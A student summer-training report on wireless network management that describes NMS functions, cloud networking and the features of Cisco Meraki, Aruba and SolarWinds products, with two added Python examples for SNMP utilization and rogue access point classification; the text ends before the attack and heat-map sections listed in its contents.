
Summer Training Project Report

on
WIRELESS NETWORK MANAGEMENT

Under the Guidance of:

Mr. Sushil Kumar


(Senior Manager, IT Infrastructure, Network security and communication,
ITS, Tata Steel)

Submitted by:

Arnab Gupta
7th Semester, B. Tech Computer Science and Engineering (2015-2019 batch),
KIIT University, Bhubaneswar
(Tata Steel Prashikshan- 2018, Reference Number- VT20180379)

Page 1 of 56
Table of Contents

1. Introduction ...............................................................................................................................3
2. Cloud Networking .....................................................................................................................5
3. Available Technologies ............................................................................................................6
4. Cisco Meraki .............................................................................................................................8
4.1. Wireless LAN ....................................................................................................................8
4.2. Cloud Managed Security and SD WAN ............................................................................8
4.3. Cloud Managed Switches ..................................................................................................9
4.4. System Management Software ........................................................................................10
5. Aruba Networks .......................................................................................................................11
5.1. AirWave ............................................................................................................................11
5.2. ArubaCentral.....................................................................................................................12
6. SolarWinds...............................................................................................................................14
6.1. Network Management Tools ............................................................................................14
6.1.1. Network Management Monitor..............................................................................14
6.1.2. Network Configuration Manager ...........................................................................15
6.1.3. Log Manager ..........................................................................................................16
6.1.4. IP Address Manager ...............................................................................................17
6.1.5. User Device Tracker ..............................................................................................18
6.1.6. Netflow Traffic Analyzer .......................................................................................19
6.1.7. Network Topology Mapper....................................................................................20
6.2. Security Management Tools .............................................................................................21
6.2.1. SIEM tool ...............................................................................................................21
6.2.2. Patch Manager .......................................................................................................22
7. Managed Wi-Fi ........................................................................................................................23
8. Managed Engine ......................................................................................................................24
8.1. OpManager .......................................................................................................................24
8.2. NetFlowAnalyzer ..............................................................................................................25
8.3. Network Configuration Manager ......................................................................................27
8.4. OpUtils ..............................................................................................................................28
9. Wireless Enterprise Attacks .....................................................................................................29
10. Heat Map Testing .....................................................................................................................37
11. Cryptographic Measures to increase Network Security...........................................................44
12. Comparative study between different cloud network management system.............................48
13. Conclusion ...............................................................................................................................54
14. References ................................................................................................................................56

INTRODUCTION
A network management system (NMS) is a set of hardware and/or software tools that allow an
IT professional to supervise the individual components of a network within a larger network
management framework.

Key features of a network management tool are:

1. Network device discovery – Identifying the devices present in a LAN or WAN.
2. Network device health monitoring – Monitoring the individual devices in a network to
determine whether the health and performance of the network components match the
capacity plans and intra-enterprise service-level agreements.
3. Real-time network performance analysis – Tracking performance indicators such as
bandwidth utilization, packet loss, latency, availability and uptime of routers, switches and
other SNMP-enabled devices.
4. Maintenance and firmware management – Performing firmware updates and updating
device licenses on network devices.
5. Reporting – Generating periodic reports of device and network health, and a security
report whenever the monitoring devices detect an intrusion.
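As an added example (not code from the report or from any vendor product), the following shows how an NMS derives the performance indicators listed above from raw SNMP data: utilization from the IF-MIB octet counters (including 32-bit counter wrap), availability from poll results, and uptime from sysUpTime. All sample values are constructed and no device is polled.

```python
"""Interface utilization and availability computed from SNMP polls.

Added example (not from the report or from any vendor product): turns raw
IF-MIB counters (ifInOctets, ifOutOctets, ifSpeed) and sysUpTime into the
bandwidth-utilization, availability and uptime indicators an NMS reports.
All sample values are constructed; no device is polled.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

COUNTER32_MAX = 2 ** 32  # ifInOctets/ifOutOctets are 32-bit counters that wrap


@dataclass(frozen=True)
class Sample:
    """One SNMP poll of a single interface.

    sysuptime is in hundredths of a second, as sysUpTime (TimeTicks) reports it;
    if_speed is bits per second, as ifSpeed reports it.
    """
    sysuptime: int
    in_octets: int
    out_octets: int
    if_speed: int


def counter_delta(prev: int, cur: int, max_value: int = COUNTER32_MAX) -> int:
    """Difference between two counter readings, allowing for one wrap-around.

    A 100 Mbit/s link can wrap a 32-bit octet counter in under six minutes,
    so an NMS that polls every 5 minutes must handle cur < prev.
    """
    if cur >= prev:
        return cur - prev
    return max_value - prev + cur


def utilization(prev: Sample, cur: Sample) -> Optional[Tuple[float, float]]:
    """Return (inbound %, outbound %) utilization between two polls.

    Returns None when the interval cannot be evaluated: sysUpTime went
    backwards (the device rebooted, so the counters restarted and the delta
    is meaningless), the interval is empty, or ifSpeed is unknown (0).
    """
    if cur.sysuptime < prev.sysuptime:
        return None
    seconds = (cur.sysuptime - prev.sysuptime) / 100
    if seconds <= 0 or cur.if_speed <= 0:
        return None
    in_bits = counter_delta(prev.in_octets, cur.in_octets) * 8
    out_bits = counter_delta(prev.out_octets, cur.out_octets) * 8
    capacity_bits = seconds * cur.if_speed
    return (round(100.0 * in_bits / capacity_bits, 2),
            round(100.0 * out_bits / capacity_bits, 2))


def utilization_series(samples: List[Sample]) -> List[Optional[Tuple[float, float]]]:
    """Utilization for each consecutive pair of polls (None marks a reboot gap)."""
    return [utilization(a, b) for a, b in zip(samples, samples[1:])]


def availability(poll_ok: List[bool]) -> float:
    """Availability KPI: percentage of polls that received an SNMP response."""
    if not poll_ok:
        return 0.0
    return round(100.0 * sum(poll_ok) / len(poll_ok), 2)


def uptime_days(sysuptime: int) -> float:
    """Device uptime in days from sysUpTime (hundredths of a second)."""
    return round(sysuptime / 100 / 86400, 2)


# Constructed polls of one 100 Mbit/s interface, 60 s apart.
SAMPLES = [
    Sample(sysuptime=100_000, in_octets=4_294_000_000, out_octets=1_000_000,
           if_speed=100_000_000),
    # 60 s later: the inbound counter has wrapped past 2^32 (37.5 MB received),
    # the outbound counter has advanced by 75 MB.
    Sample(sysuptime=106_000, in_octets=36_532_704, out_octets=76_000_000,
           if_speed=100_000_000),
    # Next poll after a reboot: sysUpTime and both counters restarted.
    Sample(sysuptime=3_000, in_octets=500_000, out_octets=200_000,
           if_speed=100_000_000),
]

if __name__ == "__main__":
    for i, result in enumerate(utilization_series(SAMPLES), start=1):
        print(f"interval {i}: {result if result else 'skipped (device rebooted)'}")
    print("availability:", availability([True, True, False, True]), "%")
```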

Limitations:

Security in Wireless Network Connections

Ad hoc wireless network signals are weak compared with those of a wireless network built
around routers. Wireless networks are costly, but they are easy to deploy. The real challenge
comes when we try to secure their signals: an insecure wireless network can be attacked by
hackers. Wireless connections are therefore not preferred in banks and other sensitive
departments, where loss of information means loss of everything. Wireless signals are far
easier to intercept than wired signals, so for safe and reliable transfer of data the experts still
prefer wired connections.

Other Limitations to Wireless Networks

Wireless signals are blocked by obstacles such as walls, gates and human beings. Signal
strength depends on location: the closer you are to the infrastructure, the better the signal you
receive. For example, if a wireless infrastructure is set up on a university campus, students
spread across the campus cannot all access it, because signal strength varies from place to
place; in short, the whole campus cannot be served by a single wireless connection. Wireless
signals can also be hindered by other electronic devices, by the operating frequency and by
the height above the ground. The fear of unauthorized users is the biggest concern for people
transferring sensitive information: if your wireless Internet connection is not secured, any
unauthorized user can exploit the signals or even hack important information. Ad hoc wireless
technology requires expensive personal digital devices (PDAs) such as BlackBerry handsets,
palmtops, laptops and smartphones, and each upgrade of wireless technology also requires you
to refresh your knowledge of how to use it. Although wireless technology is very common, it
remains an expensive way of staying connected. A wireless network is less stable and less
efficient than a wired connection, and it operates on the rule "the nearer, the faster". Initial
setup is complicated: a wireless connection requires the setup of stations, the transmission
media that allow the wireless system to operate.

Cost associated with wireless network upgradation and maintenance

The cost of establishing a wireless network can also be counted among its limitations. An
802.11g router costs approximately $25 to $125, and a laptop card or PCI card can cost $50 to
$150. That is not all: one must also consider the additional costs associated with a wireless
connection, for example the cost of connecting a router to a DSL modem. If the router
connected to the DSL modem operates at a distance of 100 meters, an additional router must be
attached to receive the signal. The cost of managing and upgrading the wireless network
cannot be neglected at all.

CLOUD NETWORKING
Cloud networking (and Cloud based networking) is a term describing the access of networking
resources from a centralized third-party provider using Wide Area Network (WAN) or Internet-
based access technologies.
Cloud networking is related to the concept of cloud computing, in which centralized computing
resources are shared among customers or clients. In cloud networking, the network is shared as
well as the computing resources. This has spurred a trend of pushing more network management
functions into the cloud, so that fewer customer-premises devices are needed to manage the network.

Benefits Realized with Cloud Networking

Lower Costs: With cloud networking, companies have lower capital expenditures than when
purchasing all their own equipment and software. In addition, there is no worry about
purchasing upgrades to hardware or software; the cloud networking provider takes care of this.
Cloud networking is based on a pay-per-use model, and payments are usually monthly or
yearly. Cloud networking is also considered a green solution, since no rack space is used,
which results in lower utility costs.

Fast Deployment: Another major benefit of cloud networking is faster deployment as compared
to purchasing and installing your own networking equipment. Many cloud networking
applications such as network management can be turned on within a few days, hours, or even
minutes depending on the provider. Using cloud networking lets IT users quickly utilize new
applications without spending time installing and configuring networking equipment.

Instant Scalability: The ability to quickly add capacity is a huge benefit with cloud networking.
Instead of IT procuring more networking hardware and/or software in-house for their additional
end-users and waiting weeks or months to be up and running, cloud networking providers can
quickly enable IT customers

Mobility: Since cloud networking applications are typically Web-based, IT users can access their
network-related data at any time and from anywhere, using any device with Internet capability. IT
users don’t have to be tied to their desks.

AVAILABLE TECHNOLOGIES

The following are the available enterprise wireless network management systems:

• Cisco Meraki: Cisco Meraki offers robust, easy-to-manage cloud-managed wireless, switches
and firewalls. Combining all three products into a single unit for small businesses and branch
offices is a great way to cut costs and reduce complexity. It also brings enterprise-grade
wireless security features such as unified threat management (UTM).

• Aruba Networks: A Hewlett Packard Enterprise company, Aruba is looking to get into the
rapidly expanding IoT market by updating its ClearPass Policy Manager to allow for easier
management of Wi-Fi-connected IoT devices.

• 4ipnet: A relatively smaller vendor as compared to the likes of Cisco and Aruba, 4ipnet is a
Taiwan-based company looking to aggressively expand into regions around the globe. 4ipnet
is especially popular in the public Wi-Fi space thanks to the wide variety of methods that end
users can authenticate. This includes authentication via common social networks such as
Facebook, Google+, OpenID, and social apps that are popular in localized regions throughout
the world. By offering free Wi-Fi in exchange for personal information gleaned through
social media authentications, public Wi-Fi providers are coming up with unique ways to
mine and monetize this data.

• Zebra Technologies: Zebra Technologies, the company that acquired Motorola Solutions in
2014 -- largely for its wireless portfolio and customer base -- is banking on the fact that
enterprises are tired of being in the dark when it comes to troubleshooting application
performance problems on the WLAN. The company's recently released Zebra NSight
platform provides the visibility and analytics that many WiFi administrators seek.

• Edgecore Networks: Known for its open-source layer 2 and layer 3 switches, Edgecore is
seeking to make its name in the world of WiFi by offering the industry’s first open WiFi
products. While open networking is hot, it’s not made a tremendous impact in the world of
enterprise WLANs.

• Aerohive Networks: Aerohive sells a range of WiFi access points, routers and switches, as
well as its flagship HiveManager NG network management software, which is described as a
"next-generation, enterprise-class cloud-enabled network management solution." The
company has won quite a bit of industry recognition over the past couple of years, including
being named a "visionary" mobility solution by Gartner, and being ranked the number 245
fastest-growing company in North America on Deloitte’s 2015 Technology Fast 500.

• Cloud4Wi: Cloud4Wi's flagship product is a guest WiFi platform called Volare. The
company's customer list includes Armani, Bulgari, Burger King, Clarks Shoes, Olive Garden,
Prada and Telecom Italia, and it claims to serve more than 45 million mobile users across
15,000 locations in more than 80 countries. Headquartered in San Francisco, it also has
offices in London, Paris, Milan, Pisa and Singapore.

• Relay2 Wireless Networks: Founded in 2011, Relay2 sells cloud-managed wireless network
management services. In March, it launched the RA200, an enterprise-class, cloud-managed
Service-Ready Access Point. The company primarily serves large customers in the retail,
hospitality, sports and conference venue industries. Relay2 claims that its platform
"combines the full strengths of both the cloud and the network edge to enable innovative new
services over WiFi for service providers and their business customers by bringing cloud-
managed intelligence, applications, and content to the edge of the network, as close as
possible to mobile customers, guests, employees, and smart devices."

• Mojo Networks: Formerly known as AirTight Networks, Mojo Networks has dramatically
refreshed its WiFi offerings by getting into the highly popular cloud-managed WLAN
market. Mojo is hoping to compete with other wireless cloud vendors such as Cisco Meraki
and HPE Aruba.

• Xirrus: Xirrus is jumping on the red-hot as-a-service bandwagon with its CommandCenter product.
According to Xirrus, CommandCenter, along with its existing Xirrus Management System
(XMS) “radically simplifies the ability for MSPs to offer Wi-Fi-as-a-Service (WaaS) to their
customers.” Even more appealing, CommandCenter is offered to MSPs for free.

• Open-Mesh: The thing that sets Open-Mesh apart from other wireless AP vendors is the
modular design to its hardware. Customers can buy an access point with the bandwidth,
range and other features that best suits their needs and then select an appropriate enclosure,
whether their AP will be located indoors, outdoors, on a wall, or on a ceiling. The company
also offers free cloud controller software called CloudTrax. It includes free iOS and Android
apps that enable WiFi network management from mobile devices. The team behind Open-
Mesh used to be involved with the MIT Roofnet project, which provided the technology for
Meraki products; Meraki was later acquired by Cisco.

CISCO MERAKI

Cisco Meraki is a cloud-managed IT company headquartered in San Francisco, California. Its
solutions include wireless, switching, security, EMM, communications, and security cameras, all
centrally managed from the web. Meraki was acquired by Cisco Systems in December 2012.

Cisco Meraki products


• Wireless LAN:

Overview: Cisco Meraki access points are built from the highest-grade components and
carefully optimized for a seamless user experience. The outcome: faster connections, greater user
capacity, more coverage, and fewer support calls. Meraki access points provide deep network
insight enabling smarter network management.

Key Features:

1. Enhanced CPU for deep packet inspection.
2. Multigigabit Ethernet for 2.5 Gbps over a single cable.
3. Entire network can be monitored using a single system implemented via cloud. This
eliminates the complexity of traditional wireless controllers.
4. Dedicated Security Radio which continuously scans and protects against any security
threats.
5. Identity-based firewall that automatically assigns traffic shaping rules, VLAN tags,
bandwidth limits to enforce the right policies for each class of users.
6. Centralized management via a user-friendly web interface or Android/iOS mobile
application.

• Cloud Managed Security and SD-WAN:

Overview: Software-defined WAN (SD-WAN) is a suite of features designed to allow the
network to dynamically adjust to changing WAN conditions without the need for manual
intervention by the network administrator. By providing granular control over how certain traffic
types respond to changes in WAN availability and performance, SD-WAN can ensure optimal
performance for critical applications and help to avoid disruptions of highly performance-
sensitive traffic, such as VoIP.

Key Features:

1. Unified visibility and control of the entire network via a single dashboard: wireless,
switching, and security appliances
2. Streamlines large networks with tens of thousands of endpoints
3. Integrated IDS/IPS engine based on Snort

4. Built-in multi-site network management tools
5. Automated network monitoring and alerts
6. Intuitive interface eliminates costly training or added staff
7. Role-based administration and auditable change logs
8. Continuous feature updates delivered from the cloud
9. Layer wise traffic classification and control up to layer 7.

• Cloud Managed Switches:

Overview: The Cisco Meraki MS are cloud-managed access and aggregation switches,
combining the benefits of cloud-based centralized management with a powerful, reliable access
platform. With cloud management, thousands of ports can be simultaneously managed and
configured from a single web interface regardless of their location.

Key Features:

1. Multigigabit Ethernet provides the higher performance demanded by the latest access points
over existing cables.
2. Protects the wired network from both external and internal security threats
3. Network topology view in real-time, showing devices and their connections and even
monitor network-wide health.
4. Remote live tools for identifying and correcting issues remotely.

• System Management Software:

Overview: Cloud based systems manager offers a complete set of features for Endpoint
Management customers as well as business critical requirements for enterprise environments.

Key Features:

1. Centralized cloud management dashboard enables secure monitoring and management of all
wireless devices remotely from a single web-based or Android interface.
2. Remote troubleshooting and automatic monitoring of devices with an extended feature of
remote desktop connection for better access and control.
3. Define, edit or delete user and group policies for devices in a network.
4. Real-time network topology detection and viewing.
5. Define and deploy network settings such as wireless connectivity, security policies, and
remote VPN access to all network devices at once.
6. Protect devices and their data, control their usage with fine-grained policies, and restrict
access to features such as the app store, gaming, and content.
7. Tie Systems Manager policies to the wireless, switch, and security appliance networks. Use
Systems Manager certificates to securely connect users to WiFi.
8. Easy deployment and maintenance of free, paid, or Enterprise mobile apps. For Macs and
PCs, deploy MSI and PKG files right from the dashboard.

ARUBA NETWORKS
Aruba, a Hewlett Packard Enterprise Company, is a vendor of data networking solutions for
enterprises and businesses worldwide. Aruba Networks was founded in 2002 and is focused on
bringing Wi-Fi wireless LAN mobility solutions to enterprise networks. With its acquisition by
Hewlett-Packard (now Hewlett Packard Enterprise) in 2015, Aruba Networks has become the
entity of Hewlett Packard Enterprise bringing to market all campus and small business data
networking offerings of HPE. Its core products are wireless Access Points (APs), wired switches,
mobility controllers, and network management software.

Aruba Networks products:

▪ AirWave: AirWave lets you monitor client behavior, proactively troubleshoot application
issues, and plan for capacity.

Key Features
1. Mobile Application Usage Visibility: With Aruba AppRF, AirWave provides deep
visibility into performance and usage of mobile and web apps. Reputation reports allow
you to quickly take action against high risk sites and control Wi-Fi usage by app
category. User role, device type and location specific insights let you make quick
decisions to protect business critical apps.
2. Multi-vendor compatibility: Get granular visibility across your entire access
infrastructure and manage multiple generations of wired and wireless networks from just
about any vendor – from controllerless to controller-managed and from legacy Wi-Fi to
the latest 802.11ac WLANs.
3. Image Management: AirWave allows you to manage firmware updates on WLAN
devices by defining a minimum acceptable firmware version for each make and model of
a device. It remotely distributes the firmware image to the WLAN devices that require
updates, and it schedules the firmware updates such that updating is completed without
requiring you to manually monitor the devices.
4. Intrusion Detection System: AirWave provides advanced, rules-based rogue
classification. It automatically detects rogue APs irrespective of their location in the
network and prevents authorized IAPs from being detected as rogue IAPs. It tracks and
correlates the IDS events to provide a complete picture of network security.
5. RF Visualization Support for Instant: AirWave supports RF visualization for Instant.
The VisualRF module provides a real-time picture of the actual radio environment of
your wireless network and the ability to plan the wireless coverage of new sites.
VisualRF uses sophisticated RF fingerprinting to accurately display coverage patterns
and calculate the location of every Instant device in range. VisualRF provides graphical
access to floor plans, client location, and RF visualization for floors, buildings, and
campuses that host your network.

▪ Aruba Central: Aruba Central is a powerful cloud-based network management solution that
offers built-in analytics for actionable network and business insights. With Central, managing
Aruba Instant access points, switches, and branch controllers from the cloud ensures 24/7
access, visibility and control. Visitors, contractors and suppliers can access guest Wi-Fi
through a customizable enterprise-grade portal. Whether managing one location or many,
Central delivers the power of the cloud.

Key Features
▪ Maintenance and Firmware Management: Streamline and automate your network
management while maintaining complete control.
1. Perform one-click firmware updates or schedule specific updates.
2. Manage device licenses and user accounts with different levels of access to
Central.
3. Create groups and tag devices with labels to simplify firmware management and
configuration.
▪ Network Health Monitoring and Troubleshooting
1. Check alerts by AP, switch name, MAC address, serial number, or any other
attribute – and then click on the device for more detail.
2. Easily check connected clients, memory usage and firmware for fast
troubleshooting.
3. Individually track a client’s wireless connection, including signal strength, speed,
association history, and device type.
4. Quickly identify rogue access points with built-in Wireless Intrusion Detection
System (WIDS).
5. Launch the command line interface directly into an AP or switch if needed.
▪ Reporting: Store data indefinitely to create reports containing historical data for
internal and external compliance requirements.
1. View network, AppRF and security snapshots over a predefined period.
2. Schedule reports and receive automated email reports. Export them to PDF for
low-effort monitoring.
3. Generate Payment Card Industry (PCI) reports that document proper security
scanning was in place.
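The rules-based rogue classification that AirWave's intrusion detection and Aruba Central's WIDS describe above can be illustrated with a small classifier. This is an added example, not either product's own logic; the managed-AP inventory, corporate SSIDs, RSSI threshold and scan results are all constructed.

```python
"""Rules-based rogue access point classification.

Added example, not AirWave's or Aruba Central's own code: each BSSID heard
in an over-the-air scan is checked against the managed-AP inventory, the
corporate SSID list and a wired-side sighting flag. Inventory, SSIDs, the
RSSI threshold and the scan results are all constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class SeenAP:
    """One BSSID observed by a scanning radio."""
    bssid: str
    ssid: str
    channel: int
    rssi_dbm: int       # received signal strength at the scanning AP
    seen_on_wire: bool  # its MAC was also learned on one of our switch ports


# Constructed inventory of managed (authorized) APs, by BSSID.
AUTHORIZED_BSSIDS: Set[str] = {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}
# SSIDs that only managed APs may advertise.
CORPORATE_SSIDS: Set[str] = {"CorpWiFi", "CorpGuest"}
# BSSIDs an administrator already classified as harmless neighbours.
KNOWN_NEIGHBOURS: Set[str] = {"66:77:88:00:00:01"}
# Assumed threshold: stronger than this, the AP is probably inside our building.
NEAR_RSSI_DBM = -75


def classify(ap: SeenAP) -> str:
    """Classify one observed AP. Rules are ordered most-trusted first, so a
    managed AP can never be misreported as rogue.

    Returns one of: 'authorized', 'rogue', 'neighbor', 'suspected-rogue'.
    """
    bssid = ap.bssid.lower()
    if bssid in AUTHORIZED_BSSIDS:
        return "authorized"
    if ap.ssid in CORPORATE_SSIDS:
        # Unmanaged AP advertising a corporate SSID: our clients may join it.
        return "rogue"
    if ap.seen_on_wire:
        # Unmanaged AP bridged into our LAN: bypasses the wired perimeter.
        return "rogue"
    if bssid in KNOWN_NEIGHBOURS:
        return "neighbor"
    if ap.rssi_dbm >= NEAR_RSSI_DBM:
        # Strong, unknown and not on our wire: needs an administrator's look.
        return "suspected-rogue"
    return "neighbor"


def classify_scan(seen: List[SeenAP]) -> Dict[str, str]:
    """Classification for every BSSID in a scan, keyed by normalized BSSID."""
    return {ap.bssid.lower(): classify(ap) for ap in seen}


def rogues(seen: List[SeenAP]) -> List[str]:
    """BSSIDs that should raise an alert (rogue or suspected-rogue), sorted."""
    return sorted(b for b, verdict in classify_scan(seen).items()
                  if verdict in ("rogue", "suspected-rogue"))


# Constructed scan results.
SCAN = [
    SeenAP("00:11:22:AA:BB:01", "CorpWiFi", 36, -45, False),      # ours
    SeenAP("de:ad:be:ef:00:01", "CorpWiFi", 6, -60, False),       # copies our SSID
    SeenAP("de:ad:be:ef:00:02", "HomeNet", 11, -80, True),        # plugged into LAN
    SeenAP("66:77:88:00:00:01", "CafeFree", 1, -82, False),       # known neighbour
    SeenAP("de:ad:be:ef:00:03", "Printer-Setup", 6, -50, False),  # strong, unknown
    SeenAP("de:ad:be:ef:00:04", "Linksys", 1, -85, False),        # weak, unknown
]

if __name__ == "__main__":
    for bssid, verdict in classify_scan(SCAN).items():
        print(f"{bssid}  {verdict}")
```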

SOLARWINDS
SolarWinds Inc. is a company that develops software for businesses to help manage their
networks, systems, and information technology infrastructure. SolarWinds is headquartered in
Austin, Texas, with sales and product development offices in a number of locations in the United
States and several other countries around the world. The company was publicly traded from May
2009 until the end of 2015. It has also acquired numerous companies in the last decade, some of
which it still operates under their original brand names including Pingdom, Papertrail, and
Loggly.

SolarWinds Network Management products

1. Network Management Monitor

Reduce network outages and improve performance with advanced network monitoring
software.

Key Features

▪ Multi-vendor fault, performance, and availability monitoring with Network
Performance Monitor. Reduce network outages and quickly detect, diagnose, and
resolve multi-vendor network performance issues with affordable, easy-to-use network
monitoring software.

▪ Visual representation of the health and performance of critical network gear.
Reduce visibility gaps into critical network switches, firewalls, and load balancers with
Network Insight for Cisco Nexus, Cisco ASA, and F5 BIG-IP.
▪ View contextual and graphical portrayals of an entity and its physical and logical
relationships with auto-updating maps. See relationships for routers, switches,
interfaces, volumes, and groups, updated automatically without user intervention, so you
can maintain the network rather than the network maps.
▪ Advanced network troubleshooting for on-premises, hybrid, and cloud services with
critical path hop-by-hop analysis. Trace the path hop by hop, on-premises and into the
cloud, with NetPath.
▪ PerfStack™ cross-stack network data correlation. Accelerate identification of root
cause by dragging-and-dropping network performance metrics on a common timeline for
immediate visual correlation across all your network data.
▪ Advanced Alerting: Reduce the flood of unnecessary network alerts. Create alerts based
on simple or complex nested trigger conditions, defined parent/child dependencies, and
network topology.
▪ Wireless Network Monitoring and Management: Easily identify dead zones and
improve wireless coverage. With our network monitoring tool, you can access out-of-the-
box wireless reports, including wireless availability and rogue access points.
▪ Network Performance Baseline: Configure alerts accurately by calculating dynamic
baseline threshold data with our network performance monitoring software.

2. Network Configuration Manager

Automated network configuration and compliance management.

Key Features

▪ Network Automation: Manage rapid change across complex and multi-vendor
networks, reduce the time needed to complete repetitive tasks, and maintain standards and
service levels for uninterrupted IT.
▪ Network Compliance: Simplify network compliance using NCM’s automated network
configuration tools to deploy standardized configs, detect out-of-process changes, audit
configurations, and even correct violations.
▪ Configuration backup: Rest easy knowing you can locate the most current
configuration and quickly apply it to a replacement spare, or to roll back a blown
configuration.
▪ Vulnerability assessment: Take the hassle out of vulnerability scanning using NCM's
integration with the National Vulnerability Database and access to the most current
CVE’s to identify vulnerabilities in your Cisco devices.
▪ Device lifecycle management: Always know what devices are connected to your
network, their hardware and software configurations, and when they approach end-of-
service and end-of-life.
▪ Incident reporting: Use NCM's 53 included reports to keep stakeholders informed with
the current state of your network inventory, configuration, changes, policy compliance,
security, and planning requirements.
▪ Integration with SolarWinds NPM: NCM’s network change management works even
better when used with SolarWinds Network Performance Monitor to detect more faults,
and to identify and correct configuration errors.
▪ Centralized Administration: Use NCM's integrated console to lock down devices from
unauthorized access, delegate who can view device details and make configuration
changes and determine when network changes can occur.
▪ Enterprise Command Console: SolarWinds Enterprise Operations Console collects
performance data from an installed base of multiple SolarWinds servers, and summarizes
this data into a composite, centralized view.

3. Log Manager for Orion

Aggregate, search, and chart log data within the Orion® Platform.

▪ Syslog and trap collection and analysis: Your infrastructure is constantly generating
log data to provide performance insight. Collect, consolidate, and analyze thousands of
syslog and traps to perform root cause analysis.
▪ Real-time log stream: Traditional log collection and management tools generate reports
in plain text or HTML. SolarWinds Log Manager displays logs in an interactive real-time
log stream.
▪ Event log tagging: Easily apply (color-coded) tags to your log data to aid with filtering,
searching, and identifying performance issues.

▪ Powerful search and filter: Perform searches using basic matching. Execute searches
using multiple search criteria and apply filters to narrow results. Save, schedule, and
export search results.

4. IP Address Manager
Save time and prevent costly errors with affordable, easy-to-use IP address management
software

Key Features

▪ Automated IP Address tracking: Use active scanning to discover and track subnets and
associated address blocks and view transient IP addresses to easily identify abandoned IP
addresses and reclaim them.
▪ Integrated DHCP, DNS and IP address management: Find an open IP address and
make the DHCP reservation and DNS entries all at once from a single console.
▪ IP alerting, troubleshooting, and reporting: Monitor IP address usage, receive alerts
on subnet capacity issues and IP address conflicts, and quickly resolve issues that impact
performance.
▪ Multi-vendor DHCP and DNS support: Manage and monitor Microsoft, Cisco, and
ISC DHCP servers as well as BIND and Microsoft DNS servers from a centralized
console. Create, edit, or remove scopes or DNS zones and records.
▪ Automated static IP address requests: Automatically make reservations or enable users
to request IP addresses utilizing the built-in IP request wizard. IPAM also offers
automated reporting capabilities to track requests for compliance or change management
purposes.

▪ VMWare Integration: IPAM integrates with VMware vRealize Orchestrator
(vRO)/vRealize Automation (vRA) to automate the provisioning of IP addresses and the
updating of DNS records of virtual machines. Automating these tasks enables virtual
environments to scale dynamically.
▪ IP details and history tracking: In-depth details on all IPs and how they have been
used, including addresses that were last active a long time ago.
▪ Cloud DNS monitoring: Monitor both your Amazon Web Services (AWS) Route 53 and
Azure DNS zones and records without having to log in to separate management consoles.

5. User Device Tracker

Locate users and devices on your network with User Device Tracker

Key Features

▪ Network device location: Immediately locate network devices on your LAN and
wireless network, and retrieve switch name, port, port description, VLAN, VRF data,
vendor information, all from a single console.
▪ User identification: Gather user details and reveal all endpoint logins, specifically
endpoint name and most recent login time.
▪ Device access history and log reports: Use the “History Connections” and “All User
Logins” views to find the date and time a user entered the network, through which node,
port, SSID or access point, and via what connection type.
▪ Device support: Take advantage of multi-vendor device support that’s compatible with
many SNMP-managed switches and access points.
▪ Port details: View port description, VLAN assignment, connected MACs, and port
configuration.

▪ Turn remote ports on and off: Remotely shut down a compromised network device port
with point-and-click simplicity. Detect rogue devices and shut down the port to mitigate
security risks or prevent network problems.
▪ Unified IT-administration dashboard: The UDT dashboard integrates with other
SolarWinds management products including Network Performance Monitor, IP Address
Manager, Network Configuration Manager, and more.

6. NetFlow Traffic Analyzer

Network traffic analyzer and bandwidth monitoring software

Key Features

▪ Bandwidth monitoring: Monitoring of Cisco NetFlow, Juniper J-Flow, sFlow, Huawei
NetStream, and IPFIX flow data identifies which applications and protocols are
consuming the most bandwidth.
▪ Network traffic analysis: NetFlow Traffic Analyzer collects traffic data, correlates it
into a useable format, and presents it to the user in a web-based interface for monitoring
network traffic.
▪ Malicious traffic identification: Monitoring of TCP/UDP flows to port 0 highlights
traffic that no legitimate application should generate, so malformed or crafted packets
can be spotted quickly.
▪ WLC traffic monitoring: In today's mobile world, it's important to keep your wireless
network running smoothly. With WLC network traffic analysis, you can easily see what's
using your wireless bandwidth.

▪ Performance Analysis: Accelerates identification of root cause by dragging-and-
dropping network performance metrics on a common timeline for immediate visual
correlation across all your network data.
▪ NBAR2 advanced application recognition: Cisco NBAR2 support gives you visibility
into HTTP (port 80) and HTTPS (port 443) traffic by application, without the need for
additional probes or SPAN ports.

7. Network Topology Mapper

Automatically plot your network in minutes with network mapping software.

▪ Automated device discovery: Automatically discover your entire network and create
comprehensive, detailed network maps in minutes. You can also edit node details of map
objects and connect network devices manually.
▪ Auto detection of topology changes: Keep your network maps up to date by automatically
detecting new devices and changes to network topology with scheduled network
scanning.
▪ Multilevel network discovery: Discovery draws on several methods (ICMP, SNMP, WMI
and CDP among them), so devices are still found when one protocol is blocked or
unsupported on a given node.
▪ Export network maps: Network maps can be exported to Microsoft Office Visio, PDF,
and PNG formats, and also schedule updated map exports to Orion® Network Atlas.

IT Security Management Tools

1. Security Information and Event Management (SIEM) Tool

Log & Event Manager makes it easy to use logs for security, compliance, and
troubleshooting

Key Features

▪ Real-time event correlation: Receive instant notification and quickly remediate threats
by processing log data in memory.
▪ Threat Intelligence: Alert on suspicious security events via a threat intelligence feed that
inspects for matches against known bad hosts and other risks to your environment.
▪ Advanced search and forensic analysis: Search stored events using built-in defaults,
correlation rules, reports, and active responses.
▪ USB device monitoring: Gain valuable insight into USB device and file activity while
enforcing USB privacy policies.
▪ Active response: Immediate threat mitigation with automated actions that block IP
addresses, disable user accounts, shut down switch ports, or stop malicious/infected
services remotely.
▪ Compliance reports: Streamline compliance with out-of-the-box reporting for HIPAA, PCI
DSS, SOX, ISO, NCUA, FISMA, FERPA, GLBA, NERC CIP, GPG13, DISA STIG, and
more.

2. Patch Manager
Intuitive patch management software for quickly addressing software vulnerabilities

Key Features

▪ Microsoft WSUS patch management: WSUS is an excellent tool, but it lacks the ability
to effectively schedule patches and report on patch status and inventory. Manage patches
for your Microsoft products, and diagnose and fix problems from the Windows Update
Agent.
▪ Integrations with SCCM: Despite using SCCM, when it comes to patch management
and software distribution of non-Microsoft updates, things can get complicated. View
details for a variety of 3rd-party software patches and the status of endpoints managed by
SCCM.
▪ Vulnerability management: Discovery of patch statuses and vulnerabilities of all
Microsoft and other 3rd-party applications.
▪ Pre-built/pre-tested packages: Using 3rd-party app packages, including Java, that are
already built and tested by SolarWinds.
▪ Patch status dashboard: Tracking who got patched, with what, and what still needs to
be patched is hard enough, especially with new patches mounting. View the latest
available patches, top 10 missing patches, and the general health of your environment.
